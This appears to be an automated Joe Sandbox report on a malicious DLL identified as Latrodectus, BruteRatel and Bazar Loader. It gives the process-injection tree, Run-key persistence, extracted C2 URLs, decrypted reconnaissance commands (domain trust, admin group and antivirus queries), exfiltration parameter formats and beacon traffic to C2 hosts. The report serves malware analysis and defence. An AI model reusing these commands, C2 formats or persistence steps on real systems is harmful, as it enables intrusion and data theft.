Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
upfilles.dll.dll

Overview

General Information

Sample name:upfilles.dll.dll
(renamed file extension from exe to dll)
Original sample name:upfilles.dll.exe
Analysis ID:1439879
MD5:ccb6d3cb020f56758622911ddd2f1fcb
SHA1:4a013f752c2bf84ca37e418175e0d9b6f61f636d
SHA256:f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
Tags:exe
Infos:

Detection

Bazar Loader, BruteRatel, Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 6632 cmdline: loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 344 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5472 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • regsvr32.exe (PID: 2180 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • rundll32.exe (PID: 6296 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6324 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 6688 cmdline: C:\Windows\system32\WerFault.exe -u -p 6324 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 6516 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 3732 cmdline: C:\Windows\system32\WerFault.exe -u -p 6516 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7264 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7272 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7388 cmdline: C:\Windows\system32\WerFault.exe -u -p 7272 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7288 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7396 cmdline: C:\Windows\system32\WerFault.exe -u -p 7288 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7296 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7320 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • rundll32.exe (PID: 7856 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow MD5: EF3179D498793BF4234F708D3BE28633)
        • rundll32.exe (PID: 7984 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel is a a Customized Command and Control Center for Red Team and Adversary SimulationSMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more.Built-in debugger to detect EDR userland hooks.Ability to keep memory artifacts hidden from EDRs and AV.Direct Windows SYS calls on the fly.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
NameDescriptionAttributionBlogpost URLsLink
Unidentified 111 (Latrodectus), LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
    00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
      00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
        00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
          00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
            Click to see the 35 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.3.rundll32.exe.7df4f0220000.0.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
              22.0.explorer.exe.13a0000.0.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                18.3.rundll32.exe.7df4f0220000.0.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                  22.0.explorer.exe.13a0000.0.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                    22.2.explorer.exe.13a0000.0.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: RunDLL32 Spawning Explorer
                      Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7320, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 2580, ProcessName: explorer.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32 "C:\Users\user\AppData\Roaming\upfilles.dll", stow...`.U. `.....#..p..8.. `......., EventID: 13, EventType: SetValue, Image: C:\Windows\System32\rundll32.exe, ProcessId: 7320, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 22.0.explorer.exe.13a0000.0.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}
                      Multi AV Scanner detection for submitted file
                      Source: upfilles.dll.dllReversingLabs: Detection: 15%
                      Sample uses string decryption to hide its real strings
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c ipconfig /all
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c systeminfo
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c nltest /domain_trusts
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c net view /all /domain
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c nltest /domain_trusts /all_trusts
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c net view /all
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &ipconfig=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c net group "Domain Admins" /domain
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c net config workstation
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c whoami /groups
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &systeminfo=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &domain_trusts=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &domain_trusts_all=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &net_view_all_domain=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &net_view_all=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &net_group=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &wmic=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &net_config_ws=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &net_wmic_av=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &whoami_group=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "pid":
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "%d",
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "proc":
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "%s",
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "subproc": [
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &proclist=[
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "pid":
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "%d",
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "proc":
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "%s",
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "subproc": [
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &desklinks=[
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: *.*
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "%s"
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Update_%x
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Custom_update
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: .dll
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: .exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: runnung
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: -.V71R?b;<=>&GAg"Ovz_~zzva6WQp2
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: [8<z'Hsw)sXs[wsoVWXYZ[r;X\@hS1W{S9_<S!WUSpqrsZp
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: ;[8<H'sws]sXwsoo(?8fI/^3753hijkBhlX;1*
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /files/
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Electrol
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: .+`lgSRHYJPpU\IETT05?=CAI
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: POST
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: GET
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: curl/7.88.1
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: p:
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: URLS
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: COMMAND
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: ERROR
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: -./012R35Q^U0R]v?z4~:z5v!YRYOIJ_
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: sZp
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: @-
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: <html>
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: <!DOCTYPE
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %s%d.dll
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: 12345
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &stiller=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %s%d.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: LogonTrigger
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %x%x
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: TimeTrigger
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: PT0H%02dM
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &mac=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %02x
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: :%02x
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: PT0S
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &computername=%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &domain=%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: \*.dll
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: @ACDEGwIuKMNOPQRSTUx1^ZR=/m=m6U0U:],]'U%U*-s-~5V5P=W=Z5Y5V-s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: https://workspacin.cloud/live/
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: https://illoskanawer.com/live/
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: AppData
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Desktop
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Startup
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Personal
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Local AppData
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: \update_data.dat
                      Source: unknownHTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2
                      Source: Binary string: X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800192B8 FindFirstFileExW,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013ADCE0 FindFirstFileW,

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 138.124.183.215 443
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.69.236.35 443
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 91.194.11.183 443
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 54.175.181.104 443
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 95.164.68.73 443
                      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.16.155 443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://workspacin.cloud/live/
                      Source: Malware configuration extractorURLs: https://illoskanawer.com/live/
                      Source: Joe Sandbox ViewASN Name: NASSIST-ASGI NASSIST-ASGI
                      Source: Joe Sandbox ViewASN Name: NOKIA-ASFI NOKIA-ASFI
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: HQservCommunicationSolutionsIL HQservCommunicationSolutionsIL
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 656Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 444Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
